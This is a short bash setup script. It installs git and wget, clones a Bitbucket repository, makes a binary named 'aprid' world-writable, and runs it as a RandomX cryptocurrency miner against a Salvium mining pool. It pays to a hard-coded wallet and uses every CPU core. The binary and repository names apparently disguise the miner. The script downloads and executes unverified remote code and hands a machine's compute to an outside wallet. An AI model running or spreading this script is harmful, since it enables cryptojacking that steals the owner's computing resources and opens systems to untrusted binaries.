#!/bin/bash
yum update && yum -y install sudo
yum -y install git wget
git clone https://bitbucket.org/asana/luo.git && cd luo
chmod 777 aprid SHA256SUMS
./aprid --donate-level 1 -o us.salvium.herominers.com:1230 -u solo:SaLvsBNEe9f4UU44GTrxWoeLHad8nqh4qimmopL19TNLBFZtuaZPFZx2BpjLzYrh3hUonm7nJQTmnafp7TcYcU32EEanSsZfqWP -p anak2 -a rx/0 -k -t $(nproc --all)
